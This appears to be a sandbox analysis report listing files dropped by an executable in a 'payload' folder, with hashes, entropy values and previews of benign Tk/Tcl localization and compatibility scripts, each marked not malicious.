                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset eo "&Abort" "&\u0108esigu".. ::msgcat::mcset eo "&About..." "Pri...".. ::msgcat::mcset eo "All Files" "\u0108iuj dosieroj".. ::msgcat::mcset eo "Application Error" "Aplikoeraro".. ::msgcat::mcset eo "&Blue" "&Blua".. ::msgcat::mcset eo "Cancel" "Rezignu".. ::msgcat::mcset eo "&Cancel" "&Rezignu".. ::msgcat::mcset eo "Cannot change to the directory \"%1\$s\".\nPermission denied." "Neeble \u015dan\u011di al dosierujo \"%1\$s\".\nVi ne rajtas tion.".. ::msgcat::mcset eo "Choose Directory" "Elektu Dosierujon".. ::msgcat::mcset eo "Cl&ear" "&Vakigu".. ::msgcat::mcset eo "&Clear Console" "&Vakigu konzolon".. ::msgcat::mcset eo "Color" "Koloro".. ::msgcat::mcset eo "Console" "Konzolo".. ::msgcat::mcset eo "&Copy" "&Kopiu".. ::msgcat::mcset eo "Cu&t" "&Eltondu".. ::msgcat::mcset eo "&Delete" "&Forigu".. ::msgcat::mcset eo "Details >>" "Detaloj >>".. ::msgcat::mcset eo "Directory \"%1\$s\" does not exi
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4024
                                                                                                                                                                                                                                            Entropy (8bit):4.536517819515934
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nN0T1Lt8ZYSih/aiik148aFscyTzoixccUTqjcg60Dx/H5:nN0BLSQUXy/o8re055
                                                                                                                                                                                                                                            MD5:4765F3C055742530E4644771EBC6C69F
                                                                                                                                                                                                                                            SHA1:8BEA722AC00522DEAA5B380AEEF4CA57D7A271BD
                                                                                                                                                                                                                                            SHA-256:D2842B80F1B521EFF2D2656A69274B5F2A8F4F5831AF2E8EE73E3C37389F981F
                                                                                                                                                                                                                                            SHA-512:9CA247F22797A1A1FCA42B5CDABF58262ED95EECDDD321CEB1440A60A4375923E0F511238F360D159EB5EED6F82CBBE0B8907A07CC77DB831BF97082932CD0FD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset es "&Abort" "&Abortar".. ::msgcat::mcset es "&About..." "&Acerca de ...".. ::msgcat::mcset es "All Files" "Todos los archivos".. ::msgcat::mcset es "Application Error" "Error de la aplicaci\u00f3n".. ::msgcat::mcset es "&Blue" "&Azul".. ::msgcat::mcset es "Cancel" "Cancelar".. ::msgcat::mcset es "&Cancel" "&Cancelar".. ::msgcat::mcset es "Cannot change to the directory \"%1\$s\".\nPermission denied." "No es posible acceder al directorio \"%1\$s\".\nPermiso denegado.".. ::msgcat::mcset es "Choose Directory" "Elegir directorio".. ::msgcat::mcset es "Cl&ear" "&Borrar".. ::msgcat::mcset es "&Clear Console" "&Borrar consola".. ::msgcat::mcset es "Color".. ::msgcat::mcset es "Console" "Consola".. ::msgcat::mcset es "&Copy" "&Copiar".. ::msgcat::mcset es "Cu&t" "Cor&tar".. ::msgcat::mcset es "&Delete" "&Borrar".. ::msgcat::mcset es "Details >>" "Detalles >>".. ::msgcat::mcset es "Directory \"%1\$s\"
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4693
                                                                                                                                                                                                                                            Entropy (8bit):4.640083757706223
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:najdLGoC0TXwqTwPRNQXfdHzAIX169ZZv6CpvgIPJupuupw6kWVVxn6/9Yv:nWdLGo2WiMn4t5pvbxuPtx6F6
                                                                                                                                                                                                                                            MD5:BD795A1D95446BEE7AEB16FB6E346271
                                                                                                                                                                                                                                            SHA1:38469DBD386C35B90EBE0A0FE2CE9F1AB5A5444A
                                                                                                                                                                                                                                            SHA-256:893BEDCDAED4602898D988E6248B8BB0857DD66C06194B45F31340CA03D82369
                                                                                                                                                                                                                                            SHA-512:B9BDDECB1DE2025C6C4027BF6228A14D5F573F5859ED3444298809266F06E6203F72004D589314C6529A2E198039355B4FD6160F87DA8F97B55E9F841B6C3F5A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset fi "&Abort" "&Keskeyt\u00e4".. ::msgcat::mcset fi "&About..." "&Tietoja...".. ::msgcat::mcset fi "All Files" "Kaikki tiedostot".. ::msgcat::mcset fi "Application Error" "Ohjelmavirhe".. ::msgcat::mcset fi "&Apply" "K\u00e4&yt\u00e4".. ::msgcat::mcset fi "Bold" "Lihavoitu".. ::msgcat::mcset fi "Bold Italic" "Lihavoitu, kursivoitu".. ::msgcat::mcset fi "&Blue" "&Sininen".. ::msgcat::mcset fi "Cancel" "Peruuta".. ::msgcat::mcset fi "&Cancel" "&Peruuta".. ::msgcat::mcset fi "Cannot change to the directory \"%1\$s\".\nPermission denied." "Ei voitu vaihtaa hakemistoon \"%1\$s\".\nLupa ev\u00e4tty.".. ::msgcat::mcset fi "Choose Directory" "Valitse hakemisto".. ::msgcat::mcset fi "Cl&ear" "&Tyhjenn\u00e4".. ::msgcat::mcset fi "&Clear Console" "&Tyhjenn\u00e4 konsoli".. ::msgcat::mcset fi "Color" "V\u00e4ri".. ::msgcat::mcset fi "Console" "Konsoli".. ::msgcat::mcset fi "&Copy" "K&opioi".. ::msgcat::mcs
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3877
                                                                                                                                                                                                                                            Entropy (8bit):4.630737553723335
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nByEWs/3lHFB9FamsIfSAzZ2eaISAxh0BRc3jC:nByEWaRNzsSSWonMAv
                                                                                                                                                                                                                                            MD5:E279E5FFF03E1B8E9063ABC8A499A6BD
                                                                                                                                                                                                                                            SHA1:80910911F6B4830BA4DCBA9A9EAD12C9F802DDC9
                                                                                                                                                                                                                                            SHA-256:3F2CEB4A33695AB6B56E27F61A4C60C029935BB026497D99CB2C246BCB4A63C4
                                                                                                                                                                                                                                            SHA-512:8333388E421AC3F342317BEBE352809B0B190EF8B044A0BAE2FE4051974D86008BAFDCB7098E9DC39A8D9E1E08FB87F54B9D3388AF2D0185FF913DB6788C5AB5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset fr "&Abort" "&Annuler".. ::msgcat::mcset fr "About..." "\u00c0 propos...".. ::msgcat::mcset fr "All Files" "Tous les fichiers".. ::msgcat::mcset fr "Application Error" "Erreur d'application".. ::msgcat::mcset fr "&Blue" "&Bleu".. ::msgcat::mcset fr "Cancel" "Annuler".. ::msgcat::mcset fr "&Cancel" "&Annuler".. ::msgcat::mcset fr "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossible d'acc\u00e9der au r\u00e9pertoire \"%1\$s\".\nPermission refus\u00e9e.".. ::msgcat::mcset fr "Choose Directory" "Choisir r\u00e9pertoire".. ::msgcat::mcset fr "Cl&ear" "Effacer".. ::msgcat::mcset fr "Color" "Couleur".. ::msgcat::mcset fr "Console".. ::msgcat::mcset fr "Copy" "Copier".. ::msgcat::mcset fr "Cu&t" "Couper".. ::msgcat::mcset fr "Delete" "Effacer".. ::msgcat::mcset fr "Details >>" "D\u00e9tails >>".. ::msgcat::mcset fr "Directory \"%1\$s\" does not exist." "Le r\u00e9pertoire \"%1\$s\"
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4678
                                                                                                                                                                                                                                            Entropy (8bit):4.7955991577265245
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:nkCEz2TTrKmA17fzq/Hj+pUva+fQR/a5a/Thn5kU:kTqM17u/8NiMrhb
                                                                                                                                                                                                                                            MD5:4F1610E0C73DAE668E3F9D9235631152
                                                                                                                                                                                                                                            SHA1:63EE54A6C1A69B798C65C999D5F80A7AB252B6D8
                                                                                                                                                                                                                                            SHA-256:E063AD7CA93F37728A65E4CD7C0433950F22607D307949F6CB056446AFEAA4FE
                                                                                                                                                                                                                                            SHA-512:37F4B8A9CD020A77591C09AF40FBC2FA82107B2596D31B5F30CE6ECAA225417CF7A5C62FB7A93539B0D7E930D0A44F9BF2EE6BE113F831B0A72B229444672AFD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset hu "&Abort" "&Megszak\u00edt\u00e1s".. ::msgcat::mcset hu "&About..." "N\u00e9vjegy...".. ::msgcat::mcset hu "All Files" "Minden f\u00e1jl".. ::msgcat::mcset hu "Application Error" "Alkalmaz\u00e1s hiba".. ::msgcat::mcset hu "&Blue" "&K\u00e9k".. ::msgcat::mcset hu "Cancel" "M\u00e9gsem".. ::msgcat::mcset hu "&Cancel" "M\u00e9g&sem".. ::msgcat::mcset hu "Cannot change to the directory \"%1\$s\".\nPermission denied." "A k\u00f6nyvt\u00e1rv\u00e1lt\u00e1s nem siker\u00fclt: \"%1\$s\".\nHozz\u00e1f\u00e9r\u00e9s megtagadva.".. ::msgcat::mcset hu "Choose Directory" "K\u00f6nyvt\u00e1r kiv\u00e1laszt\u00e1sa".. ::msgcat::mcset hu "Cl&ear" "T\u00f6rl\u00e9s".. ::msgcat::mcset hu "&Clear Console" "&T\u00f6rl\u00e9s Konzol".. ::msgcat::mcset hu "Color" "Sz\u00edn".. ::msgcat::mcset hu "Console" "Konzol".. ::msgcat::mcset hu "&Copy" "&M\u00e1sol\u00e1s".. ::msgcat::mcset hu "Cu&t" "&Kiv\u00e1g\u00e1s".. ::ms
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3765
                                                                                                                                                                                                                                            Entropy (8bit):4.49679862548805
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nmU4xnonTjwUE5Xs6ZrT8BpXAg+Wr+u92C8t7mU9nUSs:nZ4FonFE58HBpXjr+fBJs
                                                                                                                                                                                                                                            MD5:B74C54666A5A431A782DB691B4CA3315
                                                                                                                                                                                                                                            SHA1:2BC63982C14BBA8A4C451CE31540181F40CE2216
                                                                                                                                                                                                                                            SHA-256:806930F283FD097195C7850E3486B3815D1564529B4F8E5FA6D26F3175183BC1
                                                                                                                                                                                                                                            SHA-512:8120E2FFD14E0A992E254796ADDC0DC995C921BE31688C0995D7A36FE82609D78791FEF73EAF5B14E2F0D40AD256AB8DAAA07C18E6950362B28E40B71E47C0B6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset it "&Abort" "&Interrompi".. ::msgcat::mcset it "&About..." "Informazioni...".. ::msgcat::mcset it "All Files" "Tutti i file".. ::msgcat::mcset it "Application Error" "Errore dell' applicazione".. ::msgcat::mcset it "&Blue" "&Blu".. ::msgcat::mcset it "Cancel" "Annulla".. ::msgcat::mcset it "&Cancel" "&Annulla".. ::msgcat::mcset it "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossibile accedere alla directory \"%1\$s\".\nPermesso negato.".. ::msgcat::mcset it "Choose Directory" "Scegli una directory".. ::msgcat::mcset it "Cl&ear" "Azzera".. ::msgcat::mcset it "&Clear Console" "Azzera Console".. ::msgcat::mcset it "Color" "Colore".. ::msgcat::mcset it "Console".. ::msgcat::mcset it "&Copy" "Copia".. ::msgcat::mcset it "Cu&t" "Taglia".. ::msgcat::mcset it "Delete" "Cancella".. ::msgcat::mcset it "Details >>" "Dettagli >>".. ::msgcat::mcset it "Directory \"%1\$s\" does not ex
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):4.524344068436489
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nucQswBju0x0M4U2z9KSSOzZL5KhWTqGGIrlxXvhYbL/ZO5NT+T4kiLzzdDf1SDM:nLGa0x0Mp2KSHKSv2bL/ZO5u6nRfAXU9
                                                                                                                                                                                                                                            MD5:E56229BAC5A8ABB90C4DD8EE3F9FF9F8
                                                                                                                                                                                                                                            SHA1:7527D6C3C6C84BFF0E683FFA86A21C58458EB55D
                                                                                                                                                                                                                                            SHA-256:0914FBA42361227D14FA281E8A9CBF57C16200B4DA1E61CC3402EF0113A512C7
                                                                                                                                                                                                                                            SHA-512:13649DDB06DB4BA9E39BEAF828211086A519444DA9AB5CBDD1B88B29208388189A5141F75AD94B56A348EDDE534FFADE8B19B557CB988EA4ECC9A84B135D36C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset nl "&Abort" "&Afbreken".. ::msgcat::mcset nl "&About..." "Over...".. ::msgcat::mcset nl "All Files" "Alle Bestanden".. ::msgcat::mcset nl "Application Error" "Toepassingsfout".. ::msgcat::mcset nl "&Apply" "Toepassen".. ::msgcat::mcset nl "Bold" "Vet".. ::msgcat::mcset nl "Bold Italic" "Vet Cursief".. ::msgcat::mcset nl "&Blue" "&Blauw".. ::msgcat::mcset nl "Cancel" "Annuleren".. ::msgcat::mcset nl "&Cancel" "&Annuleren".. ::msgcat::mcset nl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan niet naar map \"%1\$s\" gaan.\nU heeft hiervoor geen toestemming.".. ::msgcat::mcset nl "Choose Directory" "Kies map".. ::msgcat::mcset nl "Cl&ear" "Wissen".. ::msgcat::mcset nl "&Clear Console" "&Wis Console".. ::msgcat::mcset nl "Color" "Kleur".. ::msgcat::mcset nl "Console".. ::msgcat::mcset nl "&Copy" "Kopi\u00ebren".. ::msgcat::mcset nl "Cu&t" "Knippen".. ::msgcat::mcset nl "&Dele
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4932
                                                                                                                                                                                                                                            Entropy (8bit):4.799369674927008
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nXra9E310fwNCeVsvSmy6MZv8lWBTDGdZ3tojTyrEQmAUCIx4wBxZ:n7a9Q0fyw5MQWgP3uoZChB3
                                                                                                                                                                                                                                            MD5:8CFA2E38822303FDCB55AE3277F0B81B
                                                                                                                                                                                                                                            SHA1:447F28A5064FCEA019C60B3F9B6D50CD43C2D0E3
                                                                                                                                                                                                                                            SHA-256:EACEB1F08DE0863CCF726881E07FE5B135EA09646C5253E0CBF7DDB987EB0D92
                                                                                                                                                                                                                                            SHA-512:E38BA9059AFF55C2B22A4AE24D6A76149C76DBA8BF8646AE81D6E07D7ED490D0605034B29D9AC848E6685C8EC26A3DBE5B2EAF462B14D96376E80076FBE7082A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset pl "&Abort" "&Przerwij".. ::msgcat::mcset pl "&About..." "O programie...".. ::msgcat::mcset pl "All Files" "Wszystkie pliki".. ::msgcat::mcset pl "Application Error" "B\u0142\u0105d w programie".. ::msgcat::mcset pl "&Apply" "Zastosuj".. ::msgcat::mcset pl "Bold" "Pogrubienie".. ::msgcat::mcset pl "Bold Italic" "Pogrubiona kursywa".. ::msgcat::mcset pl "&Blue" "&Niebieski".. ::msgcat::mcset pl "Cancel" "Anuluj".. ::msgcat::mcset pl "&Cancel" "&Anuluj".. ::msgcat::mcset pl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nie mo\u017cna otworzy\u0107 katalogu \"%1\$s\".\nOdmowa dost\u0119pu.".. ::msgcat::mcset pl "Choose Directory" "Wybierz katalog".. ::msgcat::mcset pl "Cl&ear" "&Wyczy\u015b\u0107".. ::msgcat::mcset pl "&Clear Console" "&Wyczy\u015b\u0107 konsol\u0119".. ::msgcat::mcset pl "Color" "Kolor".. ::msgcat::mcset pl "Console" "Konsola".. ::msgcat::mcset pl "&Copy" "&Kopiu
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3987
                                                                                                                                                                                                                                            Entropy (8bit):4.63232183429232
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nHOT1mM5qHHxiBHb3joTjtcp2UqMxweo6VvilCMKKXx9vjM:nHOT1mMQnwB/otcUUpGX6VPVoLjM
                                                                                                                                                                                                                                            MD5:4018686F2A8E299D86BDB1478BC97896
                                                                                                                                                                                                                                            SHA1:0EECE3D57F2EA5EECE8157B06F3AFB97E1F2551A
                                                                                                                                                                                                                                            SHA-256:D687F71F0432BB0D02EFDF576E526D2C19D4136F76C41A3224A2F034168F3F34
                                                                                                                                                                                                                                            SHA-512:4D730068B2A21E1D6004205B10A9D0D5EE9683FEB03B6FB673E8B9B94ED6BE468086A52DFE97C4DBF35A07CBB2C5E276DF0952A06C78E029D53D796CB6FCC8DF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset pt "&Abort" "&Abortar".. ::msgcat::mcset pt "About..." "Sobre ...".. ::msgcat::mcset pt "All Files" "Todos os arquivos".. ::msgcat::mcset pt "Application Error" "Erro de aplica\u00e7\u00e3o".. ::msgcat::mcset pt "&Blue" "&Azul".. ::msgcat::mcset pt "Cancel" "Cancelar".. ::msgcat::mcset pt "&Cancel" "&Cancelar".. ::msgcat::mcset pt "Cannot change to the directory \"%1\$s\".\nPermission denied." "N\u00e3o foi poss\u00edvel mudar para o diret\u00f3rio \"%1\$s\".\nPermiss\u00e3o negada.".. ::msgcat::mcset pt "Choose Directory" "Escolha um diret\u00f3rio".. ::msgcat::mcset pt "Cl&ear" "Apagar".. ::msgcat::mcset pt "&Clear Console" "Apagar Console".. ::msgcat::mcset pt "Color" "Cor".. ::msgcat::mcset pt "Console".. ::msgcat::mcset pt "&Copy" "Copiar".. ::msgcat::mcset pt "Cu&t" "Recortar".. ::msgcat::mcset pt "&Delete" "Excluir".. ::msgcat::mcset pt "Details >>" "Detalhes >>".. ::msgcat::mcset pt "D
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8620
                                                                                                                                                                                                                                            Entropy (8bit):4.477728981060218
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:n9MEBGkFKT4YHCDhxqEMk0yOC2xXLtSRoxwKl9zFAWx2yuV9cDcwRjnWNQuNFNfO:T0rm8IONoRkN1w+jRQ/FoxrRHRJP
                                                                                                                                                                                                                                            MD5:C69A904A57FDC95520086E9DDFED362C
                                                                                                                                                                                                                                            SHA1:F0220602ABE91FE563E5AA6A4EA4AB43818C0CFC
                                                                                                                                                                                                                                            SHA-256:F0D310A2EE9C0AF928D822CBB39BCBE54FB2C1C95EE8167DFFD55EDC1B2FE040
                                                                                                                                                                                                                                            SHA-512:808B82F29B7BA06AF5AE44C6C23EC8DD743E93B391F060C7586D6D3FF26C97294BD11AD215848EBA422491BD50C4509330DD24C83134C7A384E81304133CAADB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset ru "&Abort" "&\u041e\u0442\u043c\u0435\u043d\u0438\u0442\u044c".. ::msgcat::mcset ru "&About..." "\u041f\u0440\u043e...".. ::msgcat::mcset ru "All Files" "\u0412\u0441\u0435 \u0444\u0430\u0439\u043b\u044b".. ::msgcat::mcset ru "Application Error" "\u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435".. ::msgcat::mcset ru "&Apply" "&\u041f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c".. ::msgcat::mcset ru "Bold" "Bold".. ::msgcat::mcset ru "Bold Italic" "Bold Italic".. ::msgcat::mcset ru "&Blue" " &\u0413\u043e\u043b\u0443\u0431\u043e\u0439".. ::msgcat::mcset ru "Cancel" "\u041e\u0442\u043c\u0435\u043d\u0430".. ::msgcat::mcset ru "&Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430".. ::msgcat::mcset ru "Cannot change to the directory \"%1\$s\".\nPermission denied." \....."\u041d\u0435 \u043c\u043e\u0433\u0443 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u043
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3908
                                                                                                                                                                                                                                            Entropy (8bit):4.658068191079967
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nT8A5cbwKmtI1sE9xt6BDyepTr2iiK/yGqXZlBp9:nD5cb2extDepTCnVpJ9
                                                                                                                                                                                                                                            MD5:1D085A672A6FCDECEF5D7D876E4C74A3
                                                                                                                                                                                                                                            SHA1:1A40C03F15A6926359CA3E5C0A809485CAD28AEE
                                                                                                                                                                                                                                            SHA-256:A6821A13D34FB31F1827294B82C4BF9586BB255CA14F78C3ACE11181F42EF211
                                                                                                                                                                                                                                            SHA-512:981EDEEF5E4C915BB8F10044096B412D1855CAD08F98A448C6C0A49A54222945EBD102DDCB9525535E0FB19313C319155FA59384605B2C36CC8B4A58693D57E7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset sv "&Abort" "&Avsluta".. ::msgcat::mcset sv "&About..." "&Om...".. ::msgcat::mcset sv "All Files" "Samtliga filer".. ::msgcat::mcset sv "Application Error" "Programfel".. ::msgcat::mcset sv "&Blue" "&Bl\u00e5".. ::msgcat::mcset sv "Cancel" "Avbryt".. ::msgcat::mcset sv "&Cancel" "&Avbryt".. ::msgcat::mcset sv "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ej n\u00e5 mappen \"%1\$s\".\nSaknar r\u00e4ttigheter.".. ::msgcat::mcset sv "Choose Directory" "V\u00e4lj mapp".. ::msgcat::mcset sv "Cl&ear" "&Radera".. ::msgcat::mcset sv "&Clear Console" "&Radera konsollen".. ::msgcat::mcset sv "Color" "F\u00e4rg".. ::msgcat::mcset sv "Console" "Konsoll".. ::msgcat::mcset sv "&Copy" "&Kopiera".. ::msgcat::mcset sv "Cu&t" "Klipp u&t".. ::msgcat::mcset sv "&Delete" "&Radera".. ::msgcat::mcset sv "Details >>" "Detaljer >>".. ::msgcat::mcset sv "Directory \"%1\$s\" does not exist." "Mapp
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4951
                                                                                                                                                                                                                                            Entropy (8bit):5.319678095131993
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nnIoT3wHqLHQslojYhOvZSVGNUpi6Zz0qBAE9A+uiTrBsyqCgnPLz:nnIoT3wHU/osIAwNILt0HE2oV6CgPLz
                                                                                                                                                                                                                                            MD5:1435107EB17A09E4AD7277FFA1C76913
                                                                                                                                                                                                                                            SHA1:9990C26829275F16C6FC494D32C4298EC541E7D3
                                                                                                                                                                                                                                            SHA-256:B6802B7B080A2D8BC3D81614EC55A609CB5EF673C7A81E93E07925D6710F90DD
                                                                                                                                                                                                                                            SHA-512:4B2CAE4FA135411761D5B7CBFFABCE87D745A9B6496C7FD7C4AF10E76EE36E51CA62A1417CF6C27070EFF9539A305BE45C010AE4F8532C8C2D915FA101F5157E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset zh_cn "&Abort" "&..".. ::msgcat::mcset zh_cn "&About..." "&....".. ::msgcat::mcset zh_cn "All Files" "....".. ::msgcat::mcset zh_cn "Application Error" "......".. ::msgcat::mcset zh_cn "&Apply" "&..".. ::msgcat::mcset zh_cn "Bold" "..".. ::msgcat::mcset zh_cn "Bold Italic" "....".. ::msgcat::mcset zh_cn "&Blue" "&..".. ::msgcat::mcset zh_cn "Cancel" "..".. ::msgcat::mcset zh_cn "&Cancel" "&..".. ::msgcat::mcset zh_cn "Cannot change to the directory \"%1\$s\".\nPermission denied." "...... \"%1\$s\".\n......".. ::msgcat::mcset zh_cn "Choose Directory" ".....".. ::msgcat::mcset zh_cn "Cl&ear" ".&.".. ::msgcat::mcset zh_cn "&Clear Console" "&....".. ::msgcat::mcset zh_cn "Color" "..".. ::msgcat::mcset zh_cn "Console" "..".. ::msgcat::mcset zh_cn "&Copy" "&..".. ::msgcat::mcset zh
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5772
                                                                                                                                                                                                                                            Entropy (8bit):5.038729016734604
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:onzxtm7EMgdMjwPqeuAmz9LD1kFIQETZqoIK/RLf7w:ozxtm7qUwi79l0sZqoBJLDw
                                                                                                                                                                                                                                            MD5:FC9E03823BEB08DAF7681C09D106DF7D
                                                                                                                                                                                                                                            SHA1:7D06FC8F98140E0FFAA2571BD522FC772E58DE54
                                                                                                                                                                                                                                            SHA-256:540EEECBA17207A56290BAFFDAE882BBD4F88364791204AD5D14C7BEDD022CCC
                                                                                                                                                                                                                                            SHA-512:2B5BAD311A703A0FE2ED67ACE311BAD4C767BCD23DFC3D9ABDF5C3604146A6A15D6BD13A14BDEFCDB2B602C708AACFAB404E96FCBA7C546AD0DAECD4BE2EB34A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# obsolete.tcl --..#..# This file contains obsolete procedures that people really shouldn't..# be using anymore, but which are kept around for backward compatibility...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# The procedures below are here strictly for backward compatibility with..# Tk version 3.6 and earlier. The procedures are no longer needed, so..# they are no-ops. You should not use these procedures anymore, since..# they may be removed in some future release.....proc tk_menuBar args {}..proc tk_bindForTraversal args {}....# ::tk::classic::restore --..#..# Restore the pre-8.5 (Tk classic) look as the widget defaults for classic..# Tk widgets...#..# The value following an 'option add' call is the new 8.5 value...#..namespace eval ::tk::classic {.. # This may need t
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1629
                                                                                                                                                                                                                                            Entropy (8bit):4.784780799273752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:g2hBuOrlkBytcqYXRE5fvvXq1EhJPqOj6Wf0cVlN:gQ6q4E5HCqhBqOhcaD
                                                                                                                                                                                                                                            MD5:9B7A8FD2C6B538FF31BDC380452C6DE3
                                                                                                                                                                                                                                            SHA1:3F915BFE85CED9F6C7E9A352718770E9F14F098E
                                                                                                                                                                                                                                            SHA-256:40CA505C9784B0767D4854485C5C311829594A4FCBDFD7251E60E6BB7EA74FD1
                                                                                                                                                                                                                                            SHA-512:43937152B844BE1E597E99DA1270E54AB1D572AE89CB759E6D41C18C9C8044CCC15A6925F9C5AF617AE9EC1404E78C2733231F4D5C6CFE4D23C546387B1FC328
                                                                                                                                                                                                                                            Malicious:false
